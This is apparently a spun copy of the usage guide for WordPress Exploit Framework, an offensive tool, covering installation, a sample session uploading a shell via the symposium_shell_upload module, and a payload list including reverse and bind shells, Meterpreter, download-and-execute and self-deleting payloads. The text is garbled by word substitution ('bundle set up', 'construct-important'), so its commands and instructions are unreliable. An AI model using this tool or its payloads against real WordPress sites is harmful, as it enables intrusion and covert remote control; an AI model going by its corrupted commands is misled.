What do I must run it?
Ensure that you’ve got Ruby >= 2.4.three put in in your system after which set up all required dependencies by opening a command immediate / terminal within the WPXF folder and working
bundle set up.
If bundler is just not current in your system, you may set up it by working
gem set up bundler.
If you’ve got points putting in WPXF’s dependencies (particularly, Nokogiri), first ensure you have all of the tooling essential to compile C extensions:
sudo apt-get set up construct-important patch
It’s attainable that you simply don’t have essential improvement header recordsdata put in in your system. Here’s what it is best to do should you ought to end up on this state of affairs:
sudo apt-get set up ruby-dev zlib1g-dev liblzma-dev
If you might be experiencing errors that point out that
libcurl.dll couldn’t be loaded, you will want to make sure the newest libcurl binary is included in your Ruby bin folder, or every other folder that’s in your atmosphere’s PATH variable.
The newest model may be downloaded from http://curl.haxx.se/download.html. As of 16/05/2016, the newest launch is marked as
Win32 2000/XP zip 7.40.zero libcurl SSL. After downloading the archive, extract the contents of the bin listing into your Ruby bin listing (if prompted, do not overwrite any current DLLs).
How do I take advantage of it?
Open a command immediate / terminal within the listing that you’ve got downloaded WordPress Exploit Framework to, and begin it by working
Once loaded, you may be offered with the wpxf immediate, from right here you may seek for modules utilizing the
search command or load a module utilizing the
Loading a module into your atmosphere will assist you to set choices with the
set command and consider details about the module utilizing
Below is an instance of how one would load the symposium_shell_upload exploit module, set the module and payload choices and run the exploit in opposition to the goal.
wpxf > use exploit/shell/symposium_shell_upload [+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20> wpxf [exploit/shell/symposium_shell_upload] > set host wp-sandbox [+] Set host => wp-sandbox wpxf [exploit/shell/symposium_shell_upload] > set target_uri /wordpress/ [+] Set target_uri => /wordpress/ wpxf [exploit/shell/symposium_shell_upload] > set payload exec [+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078> wpxf [exploit/shell/symposium_shell_upload] > set cmd echo "Hello, world!" [+] Set cmd => echo "Hello, world!" wpxf [exploit/shell/symposium_shell_upload] > run [-] Preparing payload... [-] Uploading the payload... [-] Executing the payload... [+] Result: Hello, world! [+] Execution completed efficiently
For a full record of supported instructions, check out This Wiki Page.
What is the distinction between auxiliary and exploit modules?
Auxiliary modules don’t assist you to run payloads on the goal machine, however as a substitute assist you to extract info from the goal, escalate privileges or present denial of service performance.
Exploit modules require you to specify a payload which subsequently will get executed on the goal machine, permitting you to run arbitrary code to extract info from the machine, set up a distant shell or the rest that you simply wish to do throughout the context of the online server.
What payloads can be found?
- bind_php: uploads a script that can bind to a selected port and permit WPXF to determine a distant shell.
- customized: uploads and executes a customized PHP script.
- download_exec: downloads and runs a distant executable file.
- meterpreter_bind_tcp: a Meterpreter bind TCP payload generated utilizing msfvenom.
- meterpreter_reverse_tcp: a Meterpreter reverse TCP payload generated utilizing msfvenom.
- exec: runs a shell command on the distant server and returns the output to the WPXF session.
- reverse_tcp: uploads a script that can set up a reverse TCP shell.
All these payloads, aside from
customized and the Meterpreter payloads, will delete themselves after they’ve been executed, to keep away from leaving them mendacity round on the goal machine after use or within the occasion that they’re getting used to determine a shell which fails.